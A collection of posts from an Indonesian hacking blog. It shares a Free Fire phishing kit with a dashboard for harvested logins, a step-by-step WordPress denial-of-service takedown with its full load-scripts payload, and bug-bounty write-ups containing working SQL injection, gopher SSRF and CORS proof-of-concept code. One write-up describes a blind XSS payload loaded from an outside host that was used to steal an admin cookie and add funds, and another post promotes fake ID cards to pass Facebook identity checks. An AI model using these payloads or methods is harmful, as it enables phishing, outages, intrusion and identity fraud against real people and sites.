Friday, November 13, 2020

Script Phising Free Fire 2020 Shopping Spree

 Script Phising Free Fire 2020 Shopping Spree



Halo sobat, karena banyak sekali yang minta saya untuk share script phising free fire maka sekarang saya akan share nih, sorry ya lama ga upload karena saya bingung mau upload apaan hadeh.

Jadi script phising Script Phising Free Fire 2020 Shopping Spree ini punya fitur :
  • Tanpa Email ( Jadi bisa dijalankan dimana aja )
  • Tidak mudah dibanned pihak hosting karena tidak menggunakan emai
  • Pre-True login ( Hanya email yang valid yang bisa ngisi )
  • Dilengkapi Result Dashboard

Jadi Script phising ini tidak menggunakan email untuk mengirim result, melainkan melihat langsung dari dashboard cara nya dengan membuka http://websitephisingmu.com/result.php > masukkan password yang telah di set di password.php > Berhasil, semua result akan ditampilkan...

Link Download : 
Disini

Script phising free fire, script phising 2020, script phising gratis, script phising gratis 2020

Read more

Saturday, January 25, 2020

By.U SOP Bypass | Cors Misconfiguration

Hasil gambar untuk by.u

Halo guys Rafli disini. Saya lagi semangat update nih hehehe. Kali ini saya mau sharing penemuan lagi nih dimana saya nemu CORS Misconfiguration di BY.U . Bagi yang belom tau By.u adalah provider kartu SIM yang tergolong baru dan milenial banget. byu ini anakan dari telkomsel guys silahkan kalo minat beli aja.

Ok Pertama tama kenapa saya langsung tulis write up ? karena cors misc ini adanya di API aplikasi android by.u maka dari itu kita tidak bisa melakukan real-world execution... karena cookie / barear headernya ada di aplikasi byu bukan di browser...

Jadi di api byu terdapat header :

Cache-Control: no-cache, private
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: authorization,Authorization,Content-Type,order_id,msisdn,Request-Origin

Kita bisa lihat mereka menambahkan header Allow-Origin: * yang artinya semua web bisa melakukan request ke api byu.. tapi gaes untuk melakukan csrf attack via cors misconfiguration ini dibutuhkan header Allow-Credentials: true. di byu ini gak ada headernya .. jadi kalo kita lakukan request menggunakan ajax xhr akan mendapatkan respon :
Access to XMLHttpRequest at 'http://api.byu.id/api/profile/1' from origin 'null' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.

xhr/ajax tidak bisa mengirim request ke by.u karena hal tersebut. tapi taukah kalian ada cara lain nya loh. Kita bisa membypass SOP ini dengan Browser Cache. Hal ini pernah di coba oleh Hacker yang mengirim laporan ke hackerone :
SOP Bypass using Browser Cache

Nah sudah pada baca kan  ? Nah di byu ini kita bisa dapetin email dan nama serta gambar akun tersebut, caranya kita tinggal buat javascript yang melakukan request menggunakan fetch() ke api byu. server akan meloloskan request tersebut karena kita bisa pake credentials dari web tersebut menggunakan cache.

Code :

<html>
<script>
fetch('https://api.byu.id/api/profile/1')
  .then(response => response.json())
  .then(commits => alert("Email mu adalah : " + commits.data.email + "\r\nNama : " + commits.data.name));
</script>
</html>

Jika kalian mau test kalian buka by.u lalu ambil header authorization milik kalian ( sniff request nya ) lalu copy dan paste di modify header. Setelah itu kalian bisa buka html yang berisikan code tersebut dan jeng jeng Kalian bisa dapat deh...

Oke sekian itu aja dari saya untuk kali ini semoga kalian suka. dan untuk CS byu soory ya gaes udh adu argumen ketikan. thx yu.
Read more

Tuesday, January 21, 2020

Takedown Almost Any Website Using Wordpress

Hasil gambar untuk Wordpress Exokiut

Takedown Almost Any Website Used Wordpress

     Halo guys Welcome to my Website, sudah lama saya tidak publish Postingan lagi dikarenakan bingung mau Publish apa serta masalah internal diri saya sendiri. Terakhir kali saya upload tentang hacking yakni penemuan saya SSRF di ADFly yang bisa kalian baca di blog saya. Sebenarnya banyak pengalaman hunting bug saya yang belum saya tulis dikarenakan saya bingung mau nulis apa.


     Pada Artikel kali ini saya akan membahas tentang Takedown Website yang menggunakan CMS Wordpress. Takedown disini bukan berarti Takeover ya karena emang beda, maksudnya Takedown ya bikin web ini Down, istilah Populernya DDos. ya karena emang celahnya sendiri DoS ( Denial Of Service ) oh iya bagi kalian yang belom Tau apa itu DoS nih saya akan jelaskan 

Apa itu DoS ?
 English :
A denial-of-service (DoS) attack is a type of cyber attack in which a malicious actor aims to render a computer or other device unavailable to its intended users by interrupting the device's normal functioning. DoS attacks typically function by overwhelming or flooding a targeted machine with requests until normal traffic is unable to be processed, resulting in denial-of-service to addition users. A DoS attack is characterized by using a single computer to launch the attack.

Indonesia ( Menurut Pemahaman Bahasa inggris saya ) :
Denial Of Service adalah jenis serangan cyber dimana penyerang berusaha untuk membuat service / website itu tidak berfunsi, sehingga tidak bisa digunakan dan merugikan user maupun Pemilik website.

Nah Dos ini ada yang Distributed Denial Of Service atau dikenal dengan DDoS dan DoS biasa ( entah apa namanya )

DDoS :
DDoS ini merupakan serangan DoS dimana attacker mengirim paket Secara sekaligus dengan jumlah yang besar, sehingga jika website target tidak memiliki Filter / Pencegah pengunjung Invalid maka jumlah bandwitch yang dipakai server akan naik tentunya memory juga bisa kepakai banyak banget sehingga Cukup bahaya. Namun Ddos ini sudah banyak pencegahnya, pemilik website tinggal menggunakan Service seperti Cloudflare di website nya .

DoS Biasa :
DoS ini biasanya terjadi saat ente memasukan Jumlah data yang besar maupun data yang tidak bisa di baca server, contohnya : Pixel Flood attack. Contoh saja ketika saya memasukan input "%0t" ke server / sebuah form lalu ternyata server tersebut tidak menanggapi dan malah memberikan respon 503.. nah itu namanya DoS..

Bagi kalian yang penasaran tentang DoS Versi biasa ( Bukan DDoS ) maka kalian bisa baca :

Oke kita lanjut ke bahasan selanjutnya celah dimana kita bisa takedown Wordpress Account. Jadi bugnya merupakan Exploit CVE-2018-6389 dimana saat kita membuka load-scripts.php dengan memasukan payload ( Module js berjumlah banyak ) dan mengirimkan / membuka halaman tersebut secara terus menerus akan membuat website tersebut menggunakan banyak memmory, jika sampai 100% bisa saja web tersebut down.
How To :

1. Cari Target kalian
     Oke cari target kalian yang menggunakan wordpress, oh iya untuk pembuktian ada banyak website yang bisa menangkal ddos biasa ( Cloudflare sudah terpasang ) tetapi jika yang diddos load-scrips.php cloudflare akan membiarkannya masuk ( biasanya ), tapi ada juga web yang sudah di beri proteksi tambahan.
2. Coba Buka load-scripts.php
   Buka Load-scripts.php yang terletak di : domain.com/[path]/wp-admin/load-scripts.php jika saat dibuka blank maka kemungkinan masih bisa diakses , ciri ciri tidak vulnerable adalah saat diakses halaman menjadi 403 forbidden / not found.
3. Buat Tool DDOS
      Buat atau cari tools ddos, jangan ddos bocah termux bro cari yang multithreads. kalian bisa download di : Doser.py

4. Masukkan url+payloads ke tools ddos, kirim 1-2000 request.
   
Payloads:
wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9

5. jalankan tools ddos, sekarang cek apakah web sudah terasa loading nya lama / Down / 503 error.
  Biasanya Jika yang down cuma di user itu sendiri itu severitynya dianggap low dan jarang dianggap bug, tapi jika servernya down yang artinya semua orang gak bisa akses itu severitynya P4 , mau bilang p3 tapi gk mungkin p3..


6. Jika anda Whitehat hacker laporkan ke admin website dan dapatkan hadiah darinya !


Nah dari bug tersebut banyak loh yang sudah mendapat bounty. saya sendiri sudah dapet 50 ribu dari web sugeng.id serta laporan saya di hackerone.com sudah Triage yang artinya sedang ditindak lanjuti. masih gak percaya ? berikut hacker yang dapat bounty dari exploit ini :

1. MD15Ev : Informative but awarded $100

2. Pankaj Infosec : $700 Denial Of Service

Reward yang diberikan tergantung keputusan dan reputasi website tesebut, jika web besar bisa saja dapat $200+++ jika web kecil ya kecil kemungkinan hadiah nya besar wkwkwkwk. Okelah sekian itu aja yang bisa saya bagikan semoga kalian suka hehehe jangan lupa untuk tetap baca baca writeup lain biar ilmu makin bertambah salam heker ganteng.


Read more

Sunday, October 13, 2019

Server Dibobol Hacker ! Ratusan Ribu Akun Mobile Legends Berpotensi Dihack !

Server Dibobol Hacker ! Ratusan Ribu Akun Mobile Legends Berpotensi Dihack !


Halo Sobat Semua, Pada Artikel kali ini saya membawakan Breaking News Tentang Cyber Security nih. Mohon maaf bila saya jarang sekali Post Tentang hacking lagi karena saya Bingung mau ngetik apa. Nah kebetulan nih ada Berita Hangat, Simak Berikut ini. btw Teman saya ( Tepatnya abang abangan ) Kemarin malam Merasa akunnuya dipakai orang, padahal beliau tidak terkena phising sama sekali, beliau diajak ngechat sama si hacker panjang lebar, ternyata oh ternyata seperti ini alur hack nya.



Pada Tanggal 12 Oktober 2019 Pukul 7 Malam, Seorang hacker Berinisial Y**i K*******A (Nama Saya Samarkan) membuat Postingan / Status di wall Facebook beliau, Disana dijelaskan Dia berhasil Meretas Server Moonton sehingga dia berhasil mendapatkan Ratusan Ribu Akun Mobile Legends Siap Pakai. Dia Mengupload dan Mencoba menjual List akun tersebut ke Teman Facebooknya. Dalam waktu 5 jam Postingan beliau sudah dibagikan Lebih dari 200x oleh warganet facebook.

Ngomongin Peretasnya nih, Saya kasih clue nih Beliau merupakan Pembuat sekaligus Penjual Cheat Game Android Khusus nya Mobile Legends sejak tahun 2018 loh, Dengan Berbekal skill Coding, Reverse Enginnering, Recon, Pentesting Beliau Berhasil meretas Sistem Moonton. Tidak hanya itu, dia sudah diakui di Website Platinmods Semagai Cheat Maker nya.

Data yang didapatkan sang hacker merupakan Informasi sensitive mengenai Akun Player mobile legends, disana tertera beliau mendapatkan Login key, Nick name, server id, device id, dll. Dengan menggunakan info tersebut hanya tinggal mengedit file di folder root sehingga kita bisa memainkan akun tersebut.



Jangan salah ! Hacker ini ternyata sudah menemukan celah ini sejak lama, Dia pun sudah melaporkannya ke pihak Moonton, namun sesuai aturan Ethical Hacker bilamana tidak ada respon dari vendor atau perusahaan terkait selama 60 hari ( kurang lebih ) Hacker berhak MeRelease 0Day Security ke public, sama halnya seperti Bug vBulletin yang sempat trending beberapa minggu lalu.

Oleh karena itu, segera lah lakukan Pengamanan akun seperti Mencoba Login Logout akun, karena kemungkinan session / login key nya akan berubah sehingga dia tidak bisa mengaksesnya.

Cukup Sekian Artikel kali ini mohon maaf kalau belepotan intinya ini tuh masih fresh banget ya gays, makasih loh e.
Read more

Wednesday, June 26, 2019

Gain Adfly SMTP Access with SSRF via Gopher protocol

Support saya dengan kl1ck 1kl4n guys

Adfly Gain SMTP Access with SSRF via Gopher protocol
Halo Sobat Rafli Hax0r, pada artikel sebelumnya saya menemukan celah IDOR di ADFLY dan dihadiahi sebesar $100. Nah pada postingan kali ini saya mau share Penemuan saya diadfly ini sekitar 3 hari yang lalu, Bug ini merupakan bug SSRF yang severity nya lumayan tinggi. Btw Bug ini udh di fix ya jadi jangan dicoba gk bakal work ;v.

Kemungkinan besar bug ini terdapat di setiap url shortener yang mempunyai SMTP dan yg pastinya ngefetch data dari web tersebut. Oke lanjut kecerita, Awalnya saya gabut sampai saya kepikiran untuk nyari di adfly. Setelah 20 menit mencari dan tidak ketemu, saya berbicara dalam hati "wah kayaknya ni jika kita mau ngeshort url si adfly ngefetch Title dari web tersebut, munkin aja ini vuln SSRF".
Setelah itu saya pun mencoba memasukan protocol Gopher:// ternyata gagal alias ada filter dari adflynya.

Awalnya saya menggunakan Payload FASTCGI untuk RCE di Gopherus, namun tidak work karena adfly hanya mengambil TITLE web saja. saya Pun menggunakan payload SMTP menggunakan tool Gopherus Dan menggabungkannya kedalam script PHP yang akan saya upload ke hosting milik saya. code :

<?php
header('location: gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemailhaha%40gmail.com%0ADATA%0AFrom:adf%40ly%0ASubject:Test%0AMessage:test%0A.');
?>
Saya upload ke server dengan nama poc.php, btw ini buat ngebypass filter karena adfly hanya mengizinkan protocol http / https.

Setelah itu saya coba short http://serversaya.com/poc.php ke adfly, selang beberapa menit email dari adf@ly.adf.ly masuk ke email saya ( Seperti di SS berikut ).

Saya pun melaporkannya ke adfly, selang beberapa jam bug saya di terima adfly meminta bukti Original email dari saya, saya pun memberikannya. baru lah satu hari semenjak saya melapor bug tersebut diperbaiki, untuk masalah hadiah saya belum tau kapan tapi berdasarkan pengalaman saya baru dikasih 2 bulan setelah lapor.



Timeline :

- Minggu 23 Juni 2019 23:35 WIB = Bug Found & Reported
- Senin 24 Juni 2019 17:16 WIB = Triaged
- Senin 24 Juni 2019 22:34 WIB = Bug Fixed

Terimakasih sudah membaca writeup saya kali ini, maaf kalo berantakan hehe.

Read more

Friday, May 24, 2019

Dapet THR berkat Simple But Dengerous Bug [BugBounty - SQL injection ]

Hasil gambar untuk ad network

BugBounty - SQL injection - Halo sobat, pada kesempatan kali ini saya mau share nih pengalaman saya dapat THR dari satu adnetwork bernama Badhits. jadi waktu itu saya sedang buka group IndoXploit, disana bug hunter bernama noobsec menyarankan saya untuk mencari target adsnetwork di website adswiki.net. jadi saya pun mencari disitu, langsung saja saya filter berdasarkan bintang. Kebetulan badhits ini bintangnya 5 dan saya pun tertuju untuk melakukan pentest di web tersebut.

Setelah itu saya membuka web badhits.com dan disana hanya terdapat form login tanpa form register, ternyata badhits sendiri hanya membuka registrasi bagi yang menggunakan kode referal. contohnya refferal code milik saya Disini. Nah disini saya penasaran sama request get dari accesskey= apakah bisa / possible buat di sqli ? awalnya saya berfikir "ah gk mungkin ini vuln" karena udh sering saya mencoba test sqli di url refferal tapi hasilnya zonk.

Setelah itu saya akhirnya mencoba menambahkan Quote setelah accesskey=[idreferral].
https://badhits.com/register.php?accesskey=YHR5AGySRb'

Ternyata response nya "mysql error". dalam hati saya berfikir " wah vuln nih boleh juga.

akhirnya saya mencoba metode union based. ternyata saat mencari magic number tidak keluar alias error.

lalu saya mencoba metode Xpath Injection (Extractvalue) dan akhirnya bisa boise.

Setelah itu saya mencoba mendump 1 user sebagai bukti yaitu akun si admin badhits. ternyata passwordnya di hash, saya tidak tau itu hash jenis apa. akhirnya saya menemukan table pwreset yg ternyata berisi code untuk mereset password akun.
Dikarenakan metode extractvalue memiliki limit dalam mengeluarkan output, saya cari metode lain.
Saya pun gunakan Double Query Error Based SQL injection. jadi seperti ini :


https://badhits.com/register.php?accesskey=-YHR5AGySRb' and SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(QUERY SQL LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)%23

Saya pun mendapatkan akun admin, dan langsung melaporkan ke pihak admin.
Saya tanyakan apakah dia punya bug bounty program , cs nya pun menjawab :




Langsung saja setelah itu saya laporkan ke email tersebut. Satu jam setelah saya melaporkan hal tersebut, pihak badhits menindaklanjuti bug tersebut. 30 menit kemudian bug tersebut sudah diperbaiki.



Video Poc :




Setelah itu saya dikirim $65, walaupun kecil yang penting bisa buat beli baju lebaran hehehe.
Timeline :
19 Mei 2019 22:10 = Bug Reported
19 Mei 2019 23:38 = Triaged
20 Mei 2019 00:09 = Bug Fixed & Ask for payments
24 Mei 2019 00:08 = $65 send to amy paypal :D

Thx guys. 



 
Read more

Sunday, May 19, 2019

[BUGBOUNTY] Able to see everyone original url on ADFLY


Rafli hax0r - Pada Kesempatan kali ini saya mau membagikan temuan saya lagi nih. sebenarnya ini sudah saya temukan 3 minggu lalu, saya juga sudah membuatkan video write up di youtube, nah sekarang saya mau buat versi blog nya nih. sebelumnya kalian tau ga sih apa itu adfly ? yuk simak dulu.

Apa itu adfly ?
     Adfly adalah salah satu ads network terbesar yang ada diinternet, khususnya dalam urusan "URL shortener" . adfly sendiri banyak dipilih orang karena alasan withdraw mudah dan minimum saldonya rendah serta sudah terpercaya sejak lama.

nah sudah tau kan ? Yuk cekidot kita bahas masalah bugnya.

Saat itu saya sedang boring, kemudian pikiran saya tertuju kepada adfly karena ingin ngecek saldo saya di adfly. Setelah itu saya kepikiran "Ini kan website penghasil uang, bagaimana kalau saya cari bug disini, siapa tau dia ada sedikit hadiah buat saya ;v" langsung deh saya nyari selama 20 menit, sambil membuka Fiddler 4 . Tidak lama kemudian saya mendapatkan 2 bug sekaligus. namun yang saya laporkan hanya satu yakni Broken Access Control.

How To Reproduce :
1. Open https://adf.ly/publisher/getLink?token=&id=
2. Wajib Login terlebih dahulu.
3. Pergi ke intruder ( brute forcer ) submit ke param id dari 1 - 1000
4. Maka Kita bisa tau Original url dari shortened url tersebut.

Video PoC :
`



Setelah itu saya melaporkan keadmin.  2 hari setelah report saya mendapat tanggapan dan dijanjikan hadiah. tapi hingga sekarang hadiah tersebut masih khayalan semata :(. Baiklah terimakasih sudah berkunjung semoga kalian sehat selalu amin ya rabb. semoga Bulan Puasa kali ini penuh berkah.

Timeline :
27 April 2019 = Reported This Bug
29 April 2019 = Triaged, after +- 10 minutes Bug Fixed (Dijanjikan Hadiah)
Update : Sudah Dikasih Reward berupa $100


Read more

Monday, May 13, 2019

Ngintip Admin panel Website Followers berujung Keberuntungan

Blind XSS vulnerability
Hasil gambar untuk xss

Rafli Hax0r - Halo kembali lagi di rafli hax0r kali ini saya mau cerita cerita pengalaman saya dapat uang jajan dari website jual beli followers . Saya nemuin ini saat saya sedang gabut / bosen dirumah :'v kebetulan ada teman facebook yang menjual akun vip-member.id . Setelah itu terlintas dipikiran saya "Kenapa engga coba pentest aja ? Biasanya Web followers kek gini securitynya engga terlalu dipentingin" karena kebetulan ini web cukup terkenal ( followers murah + cepat, mau beli ? kontak saya hehe :'v ).

Setelah itu saya pun nyari nyari di web tersebut selama sekitar 15 menit engga ketemu temu . nah saya terlintas kenapa engga cari subdomain / domain lain yang satu owner sama ini web ? saya pun mencari cari dan ternyata nemu domain kodokoalamedia.co.id.

Saya pun jalan jalan diwebsite tersebut selama kurang lebih 20 menit. Sampai saya menemukan form Pemesanan, disana terdapat kolom nama, nomor, pesan dan produk yang dipesan. nah disitu terlintas dalam fikiran saya (Negative Think) wah bagaimana kalo masukin payload xss trus masuk sebagai admin lalu memproses pembayaran saya :'v saya pun bergegas membuka xsshunter.com lalu mengambil payload :

"><script src=https://l33t1337(.)xss.ht></script>
Dan memasukkannya di kolom nama serta pesan. Karena kebetulan waktu itu malam malam saya berfikir ah mungkin adminnya lagi tidur, tunggu besok saja lah. Esok harinya saya melihat xsshunter lagi dan ternyata benar saja adminnya membuka panel dan xss saya fired. Ketika saya mengambil cookienya sudah expired saya pun mencoba kembali "Pura Pura Pesan" dan pada akhirnya setelah nunggu 30 menit si admin login kembali :'v saya pun dapat cookienya. Seketika saya bisa masuk admin panel.. disana saya menambahkan diri saya sebagai reseller tanpa harus bayar + karena minimum member vip-member.id adalah 1jt saya langsung bisa daftar tanpa uang 1jt, saya pun menambahkan saldo saya menjadi 5jt. disitu saya merasa SENANG sekali guys :'v karena saldo saya 5jt. Saya sudah sempat ingin menjual akun tersebut kemedia sosial, namun....



Setelah ngegabut dipanel admin saya melihat "History Login Admin.txt" didalam panel, karena tidak bisa diedit saya pun panik karena IP saya sudah ada disitu. SAya pun mencari dimedsos seputar pemilik web tersebut, Benar saja ternyata Pemilik web tersebut memiliki 16 teman yang sama seperti saya , Dia juga membuka program bug bounty bagi yang menemukan bug akan di berikan hadiah 1jt. Ketika itu juga saya pun bergegas menkontak adminnya via wa karena difacebook tidak aktif , namun si admin yang megang wa itu bukan developer / ownernya melainkan hanya pekerja saja so saya nunggu aja deh. Eh Ternyata ownernya ngebales pesan saya dia pun Bertanya tanya seputar bug tersebut .seketika dia bilang " Sini ATM kamu, biar semangat saya kasih DP nya dulu" lalu dalam hati saya berkata "Njir ini admin tumben pengertian :'v" yowes saya kirim aja deh rekening ovo ku.
Dia pun mengirim uang sejumlah Rpx.xxx.000 NAMUN itu bukan keseluruhan hadiah karena dia bilang " Ini buat buka puasa ntar, nanti ada lagi buat sahur+buka puasa setelah bug ini saya perbaiki" . Saya nambah semangat nih :'v saya pun berkata dalam hati "Duh ini gede menurutku untuk kategori xss di website lokal, tokopedia, bukalapak dan kawan kawan pun sepertinya lebih kecil dari ini". Ternyata usut punya usul si admin web ngasih 1jt (DP) karena ane berhasil masuk ke admin panel. Nah abis buka puasa si admin selesai memperbaiki saya pun dikirim lagi sebesar Rpx.xxx.000 + Saldo panel 500.000 , saya pun merasa bersukur karena hal itu dan akhirnya duitku kukasih emak buat makan makan bareng keluarga .

Reward Berupa uang :



Reward Saldo Panel :



Itulah pengalaman saya, untungnya saya tidak mengacak ngacak web tersebut dan mendapat hal yang lebih baik karena meninggalkan kejahatan. Btw adminnya dapet heker jahat yang ngebobol tu web, pengen di tindak lanjuti :'v. untung saya engga hehe.

TimeLine :

- Jum'at 11 maret 2019 = Bug Found & First Report
- Sabtu 12 Maret 2019 14:30 = Triaged by their team & Gave me $$$ [1st Reward]
- Sabtu 12 mei 2019 21:30 = Bug Fixed & 2nd Reward Given to me

Cepet banget guys :'v


-Rafli Pasya ( ./z3rb0a / lov3code )


Read more

Friday, April 26, 2019

Terlalu cinta Twice, seorang hacker meretas website Humas Polri

Terlalu cinta Twice, seorang hacker meretas website Humas Polri
         Setelah 4 hari yang lalu Twice merilis lagu baru yang berjudul "Fancy" ternyata ada fans dari indonesia yang mencurahkan isi hatinya di website Divisi Humas Polri. Website tersebut diketahui sudah diretas beberapa jam yang lalu oleh hacker yang mengatasnamakan timnya " FAC (Inisial)" entah apakah dia seorang wibu atau hanyalah pecinta cewe korea.

     Saya pun sempat kaget "WOW!" gila ya goaid dihack sama dia. usut punya usul ternyata dia mensoceng email PID Divisi Humas Polri dengan mengirim email atas nama personil / Pegawai Website tersebut. Di dalamnya hanya berisi :

Saya Cinta Twice

       Dari kejadian ini kita bisa mengambil pelajaran bahwa jangan lupa untuk mengecek dari mana email tersebut terkirim. karena hacker tidak hanya beraksi lewat dunia cyber security, tapi bisa saja Social Enginnering. Olehkarena itu Pihak pihak Cusotomer Service wajib waspada bila ada kejadian serupa.

      Sampai Artikel ini ditulis belum ada perbaikan dari website tersebut karena ini baru 30 menit setelah saya mendapatkan informasi dari hacker tersebut.

Link : https://humas.polri.go.id/download/saya-cinta-twice/

     Sekian Berita yang saya bagikan semoga bermanfaat. Sampai lupa di next artikel.
Read more

Monday, April 22, 2019

IDOR or Parameter Tampering was able me to pay less than they should

IDOR or Parameter Tampering was able me to pay less than they should




[ Indonesia ]
 Halo Selamat datang diwebsite saya, kali ini saya akan berbagi pengalaman saya menemukan Bug Parameter Tampering di sebuah website yang memiliki program bug bounty. sayangnya bug yang saya temukan ini duplicate dan belum dipatch sehingga saya akan mensensor website tersebut. baiklah mari baca awal mula saya menemukan bug ini.

 The Stories

Saya sedang bermain game pada waktu itu, sampai saya bosen karena koneksi nya lemot. Akhirnya saya memutuskan untuk keluar game, dan saya seperti biasa nonton youtube dengerin lagu, typerace sama anas anas. Dan saya bicara dalam hati “Duh bosen nih, Iseng ah cari cari bug kali aja nemu hehehe”. Okelah setelah itu saya tertuju ke salah satu platform bug bounty dan interested dengan suatu program yang ada disana.
 Setelah 20 Menit mencari saya menemukan Celah yang membuat saya bisa membeli salah satu item yang ada di suatu PAKET ITEM. Tapi setelah saya cek lebih dalam hanya work pada paket yang isinya free. Saya bingung, paket item tersebut seharga 20ribu tapi setelah dibypass saya tidak perlu bayar dan dibawa kehalaman pemilihan item, dan boom item tersebut jadi gratis, lalu saya mencobanya dan berhasil. saat itu saya sudah mau menulis laporan tapi karena saya masih penasaran, saya pun mencoba paket lain. Ternyata jika item didalam paket tersebut masih bayar kita tidak bisa memakainya. jadi saya menyimpulkan wah ini mah bugnya hanya “Membeli item secara satuan dengan parameter tampering” sehingga saya ragu. tapi dalam benak saya “Wah ini kayanya bug nya bagus deh soalnya dia gk bisa beli satuan, tapi kalo di bypass dia bisa beli”. Ane pun seneng tuh, Eh saat ane dorking di google ternyata paketan satuan tersebut bisa didorking. Saya langsung sedih karena gagal senang :’V. 


 Saya sempet Istirahat sekitar 15 menitan trus saya mendapat wahyu “Oh iya kenapa engga Coba parameter Top Up ?”


Saat itu saya menemukan Parameter seperti ini :

 http://mytarget.com/payment.php?id=[IDPEMESANAN]&nm=[redacted]500000&hg=[vulnparameter]&nama=[urname]&tlp=213123&mail=[mail]&dom=[notimportant]&ex=[lulz]&tipe=2

Saya pun merubah parameter hg dengan nominal 1000 karena jika nominalnya 0 server nya menolak. Dan setelah saya forward dia berhasil, saya pun mulai tertawa sendiri dan seneng banget coy.


Disitu tertulis total yang harus dibayar hanya 1000 dan itemnya seharga 500000. tapi disitu tertulis tidak ada metode pembayaran yang tersedia akhirnya parameter tipe= saya ganti dari 2 jadi 1. disitu tersedia pembayaran via bank. saya pun langsung membayarnya dan Pembayaran sukses :)


Saya Pun membuat laporan dan melaporkannya ke Pihak mereka. Setelah seminggu menunggu ternyata Laporannya dianggap Duplicate dengan severity HIGH. 
Cukup sekian itu aja yang bisa saya bagikan, have a nice day :D

Timeline :
14 April = Found & Reported to their team
22 April = Accepted as Duplicate
Severity : High
Rewarded : SWAG as appreciation

English Language at my medium story @androgaming1912
Read more

Monday, February 18, 2019

Cara Mengatasi Konfirmasi Identitas agar Facebook Bisa di buka Kembali

Cara Mengatasi Konfirmasi Identitas agar Facebook Bisa di buka Kembali
Hasil gambar untuk Verif Data diri facebook

Halo kawan kawan Rafli Hax0r kembali lagi bersama saya nih di website ini. Pada Kesempatan kali ini tepatnya besok adalah hari kedua saya ulangan ( Matematika coy ) saya mendapatkan ide untuk update blog ini. oleh karena itu kalian pasti butuhkan tutornya ? oke simak ya..

Konfirmasi Identitas Account Facebook biasanya terjadi ketika anda memposting hal berbau spam seperti gore, sara, dan pelecehan seksual serta pornografi. Jika sudah seperti ini anda biasanya dimintai Foto KTP ataupun identitas diri seperti KTP, SIM, dll. Nah kalian kan kaum milenial biasanya gk mau kan KTP nya kesebar / ribet nyari nyari KTP ? Nah saya ada solusinya nih simak baik baik yah.

Tutorial :
  1. Buka Link FakeKTP terbaru : Disini
  2. Nah Kalian isi deh tuh, kalau bisa nama di ktp disesuain sama nama FB nya ya agar mudah nantinya..
  3.  Tunggu 1x24 Jam maka akun akan terbuka
Oke Itu aja untuk artikel kali ini, ini simple banget btw. Oh iya bagi kalian yang mau change name FB tanpa nunggu 60 hari bisa kunjungi artikel sebelumnya : Disini ( FakeKTP pakai link terbaru ) Semoga Bermanfaat sampai jumpa di lain artikel :)
Read more

Thursday, January 24, 2019

Cara Rahasia Diterima Google Adsense Dengan Cepat, Cuma 2 hari !

 Cara Rahasia Diterima Google Adsense Dengan CepatCuma 2 hari !



     Tips Rahasia Diterima Google dengan cepat sebenarnya mudah, hanya saja butuh kesabaran ketelitian dan keuletan agar diterima. Nah Dipostingan kali ini semoga kalian bisa mengerti dan langsung diterima setelah membaca postingan ini. Tapi Pertama tama kalian disunnahkan untuk kl1k 1kl4n nya terlebih dahulu agar saya semangat ngeblog. Sebelum kalian tau apa tips and trick diterima adsense dengan mudah kalian harus tau dulu apa itu Google Adsense, siapa tau ada salah satu dari kalian yang belum mengerti.

     Google Adsense adalah program kerjasama periklanan melalui media Internet yang diselenggarakan oleh Google. Melalui program periklanan AdSense, pemilik situs web atau blog yang telah mendaftar dan disetujui keanggotaannya diperbolehkan memasang unit iklan yang bentuk dan materinya telah ditentukan oleh Google di halaman web mereka. Pemilik situs web atau blog akan mendapatkan pemasukan berupa pembagian keuntungan dari Google untuk setiap iklan yang diklik oleh pengunjung situs, yang dikenal sebagai sistem pay per click (ppc) atau bayar per klik.


